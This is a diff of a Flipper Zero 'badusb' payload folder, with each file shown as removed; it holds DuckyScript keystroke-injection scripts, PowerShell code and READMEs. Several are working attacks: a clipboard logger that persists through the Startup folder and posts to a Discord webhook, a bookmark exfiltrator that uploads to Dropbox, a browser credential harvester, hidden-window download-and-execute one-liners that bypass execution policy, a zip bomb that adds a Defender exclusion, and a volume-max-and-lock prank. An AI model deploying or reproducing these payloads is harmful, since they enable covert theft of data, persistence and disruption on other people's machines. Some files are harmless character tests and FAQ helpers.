REM Version: 1.0
REM Category: Prank
REM Launches zip bomb and opens it in parallel on however many cores the cpu has.
REM
REM startup delay
DELAY 300
GUI r
DELAY 500
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 2000
REM STRING powershell -w h Add-MpPreference -ExclusionPath C:\Windows\system32;;curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip -OutFile 42.zip;;while (1) { $NumberOfLogicalProcessor = (Get-WmiObject Win32_Processor).NumberOfLogicalProcessors;;[runspacefactory]::CreateRunspacePool(1,$NumberOfLogicalProcessors);;$RunspacePool.Open();;$PSinstance = [powershell]::(Expand-Archive -Path 42.zip -Force);;$PSinstance.RunspacePool = $RunspacePool;;$PSinstance.BeginInvoke(); }
ENTER

21
badusb/Bombs/Zip_Bomb/Win/quackparaloop11.txt
View file

@ -1,21 +0,0 @@
REM Title: Zip Bomb
REM Author: FalsePhilosopher
REM Target: Win, alt for possible 10/11 launch untested
REM Props: Hak5, friends and memes
REM Version: 1.0
REM Category: Prank
REM Launches zip bomb and opens it in parallel on however many cores the cpu has.
REM
REM startup delay
DELAY 300
GUI r
DELAY 500
STRING powershell
CTRL-SHIFT ENTER
DELAY 1500
SHIFT TAB
DELAY 500
ENTER
DELAY 2000
REM STRING powershell -w h Add-MpPreference -ExclusionPath C:\Windows\system32;;curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip -OutFile 42.zip;;while (1) { $NumberOfLogicalProcessor = (Get-WmiObject Win32_Processor).NumberOfLogicalProcessors;;[runspacefactory]::CreateRunspacePool(1,$NumberOfLogicalProcessors);;$RunspacePool.Open();;$PSinstance = [powershell]::(Expand-Archive -Path 42.zip -Force);;$PSinstance.RunspacePool = $RunspacePool;;$PSinstance.BeginInvoke(); }
ENTER

63
badusb/Bookmark-Hog/BH.ps1
View file

@ -1,63 +0,0 @@
#Bookmark-Hog
# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The chrome bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome Bookmarks to Bash Bunny
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt"
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1"
}
# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The edge bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome Bookmarks to Bash Bunny
else {
$F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt"
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2"
}
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR ACCESS TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
DropBox-Upload -f "$env:tmp/$F1"
DropBox-Upload -f "$env:tmp/$F2"
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)

111
badusb/Bookmark-Hog/README.md
View file

@ -1,111 +0,0 @@
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Bookmark-Hog
A payload to exfiltrate bookmarks of the 2 most popular browsers
## Description
This payload will enumerate through the browser directories, looking for the file that stores the bookmark history
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>

16
badusb/Bookmark-Hog/payload.txt
View file

@ -1,16 +0,0 @@
REM Title: Bookmark-Hog
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky
REM Target: Windows 10, 11
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

23
badusb/CYE_Was_Here.txt
View file

@ -1,23 +0,0 @@
DELAY 2000
GUI r
DELAY 500
STRING notepad
DELAY 250
ENTER
DELAY 500
ENTER
STRING ______ __ _
ENTER
STRING / ____/_ _____ ____ ___ ____ / /_(_) _____
ENTER
STRING / / / / / / _ \/ __ '__ \/ __ \/ __/ / | / / _ \
ENTER
STRING / /___/ /_/ / __/ / / / / / /_/ / /_/ /| |/ / __/
ENTER
STRING \____/\__ /\___/_/ /_/ /_/ ____/\__/_/ |___/\___/
ENTER
STRING /___/ /_/
ENTER
ENTER
STRING WAS HERE...
ENTER

80
badusb/Char_Test.txt
View file

@ -1,80 +0,0 @@
REM BadUSB Character Test File
REM Designed by UberGuidoZ
REM https://github.com/UberGuidoZ/Flipper
REM
DELAY 2000
GUI r
DELAY 1000
STRING notepad
DELAY 500
ENTER
DELAY 1500
STRING ; Semicolon
DELAY 250
ENTER
DELAY 250
STRING , Comma
DELAY 250
ENTER
DELAY 250
STRING < Less than
DELAY 250
ENTER
DELAY 250
STRING > Greater than
DELAY 250
ENTER
DELAY 250
STRING . Period
DELAY 250
ENTER
DELAY 250
STRING ? Question mark
DELAY 250
ENTER
DELAY 250
STRING / Forward slash
DELAY 250
ENTER
DELAY 250
STRING \ Backslash
DELAY 250
ENTER
DELAY 250
STRING [ Left bracket
DELAY 250
ENTER
DELAY 250
STRING ] Right bracket
DELAY 250
ENTER
DELAY 250
STRING * Asterisk
DELAY 250
ENTER
DELAY 250
STRING ( Left parentheses
DELAY 250
ENTER
DELAY 250
STRING ) Right parentheses
DELAY 250
ENTER
DELAY 250
STRING | Pipe
DELAY 250
ENTER
DELAY 250
STRING ~ Tilde
DELAY 250
ENTER
DELAY 250
ENTER
STRING Done for now! (Created by UberGuidoZ)
DELAY 250
ENTER
DELAY 250
STRING https://github.com/UberGuidoZ/Flipper
DELAY 250
ENTER
DELAY 250

84
badusb/Char_Test_ALTSTRING.txt
View file

@ -1,84 +0,0 @@
REM Altstring Test for special characters
REM By EJRicketts
REM
DELAY 2000
GUI r
DELAY 1000
STRING notepad
DELAY 500
ENTER
DELAY 1500
ALTSTRING ;
STRING Semicolon
DELAY 250
ENTER
DELAY 250
ALTSTRING ,
STRING Comma
DELAY 250
ENTER
DELAY 250
ALTSTRING <
STRING Less than
DELAY 250
ENTER
DELAY 250
ALTSTRING >
STRING Greater than
DELAY 250
ENTER
DELAY 250
ALTSTRING .
STRING Period
DELAY 250
ENTER
DELAY 250
ALTSTRING ?
STRING Question mark
DELAY 250
ENTER
DELAY 250
ALTSTRING /
STRING Forward slash
DELAY 250
ENTER
DELAY 250
ALTSTRING \
STRING Backslash
DELAY 250
ENTER
DELAY 250
ALTSTRING [
STRING Left bracket
DELAY 250
ENTER
DELAY 250
ALTSTRING ]
STRING Right bracket
DELAY 250
ENTER
DELAY 250
ALTSTRING *
STRING Asterisk
DELAY 250
ENTER
DELAY 250
ALTSTRING (
STRING Left parentheses
DELAY 250
ENTER
DELAY 250
ALTSTRING )
STRING Right parentheses
DELAY 250
ENTER
DELAY 250
ALTSTRING |
STRING Pipe
DELAY 250
ENTER
DELAY 250
ALTSTRING ~
STRING Tilde
DELAY 250
ENTER

3
badusb/Cookie-Stealer.txt
View file

@ -1,3 +0,0 @@
Not working, removed for now.
SEE: https://github.com/UberGuidoZ/Flipper/commit/50a8e1cbe43de86924e3ee8715dfc6676272e020

3
badusb/Copy-And-Waste/I.bat
View file

@ -1,3 +0,0 @@
@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause

119
badusb/Copy-And-Waste/README.md
View file

@ -1,119 +0,0 @@
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Copy+And+Waste!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Copy-And-Waste
A payload to exfiltrate clipboard contents
## Description
This payload uses iwr to download 2 files
* I.bat
* c.ps1
**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup
**c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click
Then the contents will then be sent to the discord webhook for viewing pleasure
For killing the script press both Ctrl buttons at the same time [It will resume at reboot]
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec) &
[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>

36
badusb/Copy-And-Waste/c.ps1
View file

@ -1,36 +0,0 @@
Add-Type -AssemblyName WindowsBase
Add-Type -AssemblyName PresentationCore
function dischat {
[CmdletBinding()]
param (
[Parameter (Position=0,Mandatory = $True)]
[string]$con
)
$hookUrl = 'YOUR DISCORD WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $con
}
Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body
}
dischat (get-clipboard)
while (1){
$Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
$Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
$cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
$xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)
if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
else {continue}
}

17
badusb/Copy-And-Waste/payload.txt
View file

@ -1,17 +0,0 @@
REM Title: Copy-And-Waste
REM Author: atomiczsec & I am Jakoby
REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
REM Target: Windows 10, 11
DELAY 2000
GUI r
DELAY 200
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH

1
badusb/Copy-And-Waste/placeholder
View file

@ -1 +0,0 @@

62
badusb/Credential_Harvester_MarkCyber.txt
View file

@ -1,62 +0,0 @@
REM This script was created by github.com/MarkCyber
REM Harvests all credentials from chrome, edge, and firefox
REM This script requires a secondary USB named "MYUSB" to save credentials to
REM The extracted data will require decryption
REM
REM Set delay for Flipper Zero
DELAY 1000
REM
REM Open PowerShell without elevated privileges
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 1000
REM
REM Check if the USB drive exists
STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
STRING if ($usbDrive -ne $null) {
ENTER
DELAY 500
STRING cd $usbDrive;
ENTER
DELAY 500
STRING mkdir BrowserData;
ENTER
DELAY 500
STRING cd BrowserData;
ENTER
DELAY 500
REM
REM Copy Chrome Login Data to USB
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
ENTER
DELAY 500
REM
REM Copy Firefox Login Data to USB
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
ENTER
DELAY 500
REM
REM Copy Edge Login Data to USB
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
ENTER
DELAY 500
STRING }
ENTER
DELAY 500
REM
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on targetPC)
STRING echo off | clip
ENTER
DELAY 500
REM
REM Close PowerShell
STRING exit
ENTER
DELAY 500
REM Check out my other badusb scripts on github.com/MarkCyber

4
badusb/Discord_FAQ/HW_Trouble.txt
View file

@ -1,4 +0,0 @@
REM Hardware Troubleshooting
STRING This may help with some of your questions. https://github.com/UberGuidoZ/Flipper/tree/main/Hardware_Troubleshooting
DELAY 100
ENTER

11
badusb/Discord_FAQ/My_Flip_Repo.txt
View file

@ -1,11 +0,0 @@
STRING You can grab a ton of helpful files or find useful info over here!
DELAY 100
SHIFT ENTER
DELAY 250
STRING https://github.com/UberGuidoZ/Flipper
DELAY 100
SHIFT ENTER
DELAY 250
STRING Make sure you view and understand the ReadMe files as they have important info.
DELAY 100
ENTER

4
badusb/Discord_FAQ/Newbie_Guide.txt
View file

@ -1,4 +0,0 @@
REM Link to newbie guide (Discord)
STRING This may help with some of your questions. https://discord.com/channels/740930220399525928/995390495415095296
DELAY 100
ENTER

9
badusb/Discord_FAQ/RM_FW_DL.txt
View file

@ -1,9 +0,0 @@
STRING You can always download RogueMaster's latest release over here!
DELAY 100
SHIFT ENTER
DELAY 250
STRING https://github.com/RogueMaster/flipperzero-firmware-wPlugins/releases
DELAY 100
SHIFT ENTER
DELAY 250
STRING Make sure you view and understand the ReadMe as it has important info.

24
badusb/Discord_FAQ/ReadMe.md
View file

@ -1,24 +0,0 @@
Some quick responses to common questions so Flipper can answer the questions!
-----
## Donation Information
Nothing is ever expected for the hoarding of digital files, creations I have made, or the people I may have helped.
## Ordering from Lab401? [USE THIS LINK FOR 5% OFF!](https://lab401.com/r?id=vsmgoc) (Or code `UberGuidoZ` at checkout.)
I've had so many asking for me to add this.<br>
![Flipper_Blush](https://user-images.githubusercontent.com/57457139/183561666-4424a3cc-679b-4016-a368-24f7e7ad0a88.jpg) ![Flipper_Love](https://user-images.githubusercontent.com/57457139/183561692-381d37bd-264f-4c88-8877-e58d60d9be6e.jpg)
**BTC**: `3AWgaL3FxquakP15ZVDxr8q8xVTc5Q75dS`<br>
**BCH**: `17nWCvf2YPMZ3F3H1seX8T149Z9E3BMKXk`<br>
**ETH**: `0x0f0003fCB0bD9355Ad7B124c30b9F3D860D5E191`<br>
**LTC**: `M8Ujk52U27bkm1ksiWUyteL8b3rRQVMke2`<br>
**PayPal**: `uberguidoz@gmail.com`
So, here it is. All donations of *any* size are humbly appreciated.<br>
![Flipper_Clap](https://user-images.githubusercontent.com/57457139/183561789-2e853ede-8ef7-41e8-a67c-716225177e5d.jpg) ![Flipper_OMG](https://user-images.githubusercontent.com/57457139/183561787-e21bdc1e-b316-4e67-b327-5129503d0313.jpg)
Donations will be used for hardware (and maybe caffeine) to further testing!<br>
![UberGuidoZ](https://cdn.discordapp.com/emojis/1000632669622767686.gif)

35
badusb/DuckyScript_UDL/ReadMe.md
View file

@ -1,35 +0,0 @@
## Created and provided by B33m0 (via Discord)
TO INSTALL
Extract the ZIP if, needed.
From the Notepad++ main window, go to Language -> Define your language...
From there, click on "import" and navigate to the folder where the [userDefineLang.xml](https://github.com/UberGuidoZ/Flipper/blob/main/BadUSB/DuckyScript_UDL/userDefineLang.xml) is stored.
Double-click on the xml file to open it. Finally click on Save-As and name the style "DuckyScript" or similar.
The default duckyscript file extension is '.duck'.
-----
## Donation Information
Nothing is ever expected for the hoarding of digital files, creations I have made, or the people I may have helped.
## Ordering from Lab401? [USE THIS LINK FOR 5% OFF!](https://lab401.com/r?id=vsmgoc) (Or code `UberGuidoZ` at checkout.)
I've had so many asking for me to add this.<br>
![Flipper_Blush](https://user-images.githubusercontent.com/57457139/183561666-4424a3cc-679b-4016-a368-24f7e7ad0a88.jpg) ![Flipper_Love](https://user-images.githubusercontent.com/57457139/183561692-381d37bd-264f-4c88-8877-e58d60d9be6e.jpg)
**BTC**: `3AWgaL3FxquakP15ZVDxr8q8xVTc5Q75dS`<br>
**BCH**: `17nWCvf2YPMZ3F3H1seX8T149Z9E3BMKXk`<br>
**ETH**: `0x0f0003fCB0bD9355Ad7B124c30b9F3D860D5E191`<br>
**LTC**: `M8Ujk52U27bkm1ksiWUyteL8b3rRQVMke2`<br>
**PayPal**: `uberguidoz@gmail.com`
So, here it is. All donations of *any* size are humbly appreciated.<br>
![Flipper_Clap](https://user-images.githubusercontent.com/57457139/183561789-2e853ede-8ef7-41e8-a67c-716225177e5d.jpg) ![Flipper_OMG](https://user-images.githubusercontent.com/57457139/183561787-e21bdc1e-b316-4e67-b327-5129503d0313.jpg)
Donations will be used for hardware (and maybe caffeine) to further testing!<br>
![UberGuidoZ](https://cdn.discordapp.com/emojis/1000632669622767686.gif)

64
badusb/DuckyScript_UDL/userDefineLang.xml
View file

@ -1,64 +0,0 @@
<NotepadPlus>
<UserLang name="DuckyScript" ext="duck" udlVersion="2.1">
<Settings>
<Global caseIgnored="no" allowFoldOfComments="no" foldCompact="no" forcePureLC="1" decimalSeparator="0" />
<Prefix Keywords1="no" Keywords2="no" Keywords3="no" Keywords4="no" Keywords5="no" Keywords6="no" Keywords7="no" Keywords8="no" />
</Settings>
<KeywordLists>
<Keywords name="Comments">00REM 01 02 03 04</Keywords>
<Keywords name="Numbers, prefix1"></Keywords>
<Keywords name="Numbers, prefix2"></Keywords>
<Keywords name="Numbers, extras1"></Keywords>
<Keywords name="Numbers, extras2"></Keywords>
<Keywords name="Numbers, suffix1"></Keywords>
<Keywords name="Numbers, suffix2"></Keywords>
<Keywords name="Numbers, range"></Keywords>
<Keywords name="Operators1"></Keywords>
<Keywords name="Operators2"></Keywords>
<Keywords name="Folders in code1, open"></Keywords>
<Keywords name="Folders in code1, middle"></Keywords>
<Keywords name="Folders in code1, close"></Keywords>
<Keywords name="Folders in code2, open"></Keywords>
<Keywords name="Folders in code2, middle"></Keywords>
<Keywords name="Folders in code2, close"></Keywords>
<Keywords name="Folders in comment, open"></Keywords>
<Keywords name="Folders in comment, middle"></Keywords>
<Keywords name="Folders in comment, close"></Keywords>
<Keywords name="Keywords1">MENU APP WINDOWS GUI SHIFT ALT CONTROL CTRL UPARROW DOWNARROW LEFTARROW RIGHTARROW UP DOWN LEFT RIGHT BREAK PAUSE CAPSLOCK DELETE END ESC ESCAPE HOME INSERT NUMLOCK PAGEUP STRING PAGEDOWN F1 F2 F3 F4 F5 F6 F7 F8 F9 F10 F11 12 PRINTSCREEN SCROLLOCK SPACE TAB ENTER</Keywords>
<Keywords name="Keywords2">DEFAULTDELAY DEFAULT_DELAY DELAY</Keywords>
<Keywords name="Keywords3">REM</Keywords>
<Keywords name="Keywords4"></Keywords>
<Keywords name="Keywords5"></Keywords>
<Keywords name="Keywords6"></Keywords>
<Keywords name="Keywords7"></Keywords>
<Keywords name="Keywords8"></Keywords>
<Keywords name="Delimiters">00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23</Keywords>
</KeywordLists>
<Styles>
<WordsStyle name="DEFAULT" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="COMMENTS" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="LINE COMMENTS" fgColor="008000" bgColor="FFFFFF" fontName="" fontStyle="3" nesting="512" />
<WordsStyle name="NUMBERS" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="KEYWORDS1" fgColor="0000FF" bgColor="FFFFFF" fontName="" fontStyle="1" nesting="0" />
<WordsStyle name="KEYWORDS2" fgColor="FF0000" bgColor="FFFFFF" fontName="" fontStyle="1" nesting="0" />
<WordsStyle name="KEYWORDS3" fgColor="008000" bgColor="FFFFFF" fontName="" fontStyle="3" nesting="0" />
<WordsStyle name="KEYWORDS4" fgColor="808080" bgColor="FFFFFF" fontName="" fontStyle="2" nesting="0" />
<WordsStyle name="KEYWORDS5" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="KEYWORDS6" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="KEYWORDS7" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="KEYWORDS8" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="OPERATORS" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="FOLDER IN CODE1" fgColor="0000FF" bgColor="FFFFFF" fontName="" fontStyle="1" nesting="0" />
<WordsStyle name="FOLDER IN CODE2" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="FOLDER IN COMMENT" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="DELIMITERS1" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="DELIMITERS2" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="DELIMITERS3" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="DELIMITERS4" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="DELIMITERS5" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="DELIMITERS6" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="DELIMITERS7" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
<WordsStyle name="DELIMITERS8" fgColor="000000" bgColor="FFFFFF" fontName="" fontStyle="0" nesting="0" />
</Styles>
</UserLang>
</NotepadPlus>

19
badusb/Earrape_Troll.txt
View file

@ -1,19 +0,0 @@
REM Title: EARRAPE_TROLL + LOCKS DEVICE
REM Creator: Grim<3
REM What this script does is open powershell runs a command that makes the targets volume to max locks the targets device and plays song or sound from a youtube link
REM For: Win10 (will use default browser)
GUI R
DELAY 1000
STRING Powershell.exe
ENTER
DELAY 1000
STRING Function Set-Speaker($Volume){$wshShell = new-object -com wscript.shell;1..50 | % {$wshShell.SendKeys([char]174)};1..$Volume | % {$wshShell.SendKeys([char]175)}}
ENTER
DELAY 2000
STRING Set-Speaker -Volume 50
ENTER
DELAY 2000
STRING start YOUR YOUTUBE LINK WITH THE HTTPS://
ENTER
DELAY 4000
GUI L

2053
badusb/FLIZZ3R/BUSY-GUI.txt
View file

File diff suppressed because it is too large Load diff

14
badusb/FLIZZ3R/EMERGENKEY_FZR.txt
View file

@ -1,14 +0,0 @@
REM Author:FLIZZ3R
REM TITLE:EMERGENKEY
REM OBJECTIVE:LINUX GOOD USB OPEN ONBOARD KEYBOARD IN AN INSTANT AND OPEN TERMINAL IF YOUR IN A JAM
REM FLIZZ3R DOESN'T ALLOW USAGE WITHOUT CONSENT OR ILLEGAL USAGE
REM FLIZZER#3706 DISCORD
GUI r
DELAY 1000
STRING Onboard
ENTER
DELAY 1000
CTRL-ALT t
DELAY 100
STRING ls
ENTER

14
badusb/FLIZZ3R/FLIZAPPAUTO.txt
View file

@ -1,14 +0,0 @@
REM Author: FLIZZ3R
REM OBJECTIVE: COOL search and open flipper app android
GOODUSB
DELAY 300
GUI f
DELAY 200
STRING flipper
DELAY 300
ENTER
ENTER
DELAY 500
RIGHTARROW
DELAY 100
ENTER

29
badusb/FLIZZ3R/FZROPEN_WRECKER.txt
View file

@ -1,29 +0,0 @@
